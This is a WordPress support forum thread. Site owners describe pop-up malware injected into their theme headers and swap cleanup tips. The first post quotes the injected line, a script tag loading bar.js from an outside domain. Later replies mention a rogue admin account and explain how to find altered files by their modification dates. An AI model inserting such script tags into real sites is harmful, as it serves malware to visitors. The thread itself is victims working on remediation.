Malware Script Suddenly appears!! Help?

  • I have a malicious pop-op that appears on my site, and i’ve found the code when i view source. It’s the reference to “top5result.com/promo…” that is messing things up!!!

    <!-- Framework CSS -->
<link rel="stylesheet" href="https://pauljohnston.com/wp-content/themes/gridblog/blueprint/screen.css" type="text/css" media="screen, projection" />
<strong><!-- sidebar script --><head><script type="text/javascript" src="https://top5result.com/promo/bar.js"></script></head></strong>
<link rel="stylesheet" href="https://pauljohnston.com/wp-content/themes/gridblog/blueprint/print.css" type="text/css" media="print" />
<!--[if IE]><link rel="stylesheet" href="https://pauljohnston.com/wp-content/themes/gridblog/blueprint/ie.css" type="text/css" media="screen, projection" /><![endif]-->

    My problem is that i can’t figure out where this code exists to remove it. Can anyone suggest anything? Curiously, the link only seems to trigger upon redirect from another site – but regardless, I want to get rid of it!

    Many thanks!!!!

Viewing 7 replies - 1 through 7 (of 7 total)
  • Thread Starter pemj

    (@pemj)

    WHOOOOPS – I figured it out.

    sorry to swallow bandwidth.

    I had the same problem!!! Creeps!!! I was able to remove the line of code from my header. I also changed my password. The problem hasn’t come back, knock on wood! Top5Result.com should be avoided due to this malware problem!

    They did it to me too, same hack. I also found a user set up as Admin that I had to delete and then changed my passwords.

    could someone please let me know how they solved this? i’m having a similar problem – a script running on my blog from worldwebworld.ru and i have no idea where/how to locate the code so i can remove it. trying to avoic having to reinstall WP. thanks in advance!

    the full script is:

    ‘hulu-com.orkut.co.in.rivals-com.worldwebworld.ru’

    i have no idea where/how to locate the code

    Check out https://www.squidoo.com/how-to-find-a-malware-script – hopefully that will help you.

    nuhira, if you have an ftp client and you’re looking at your files look for files that have modified dates that look out of place. If you set your site / theme up on a particular date and almost all files have the date you set things up on, look to see if there’s a later date. That’s probably the date that your site was hacked and the file that was hacked.

    then just open that file and look for the code and delete it.

    @dewpointproductions; this is a 10 month old thread….

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘Malware Script Suddenly appears!! Help?’ is closed to new replies.

Tags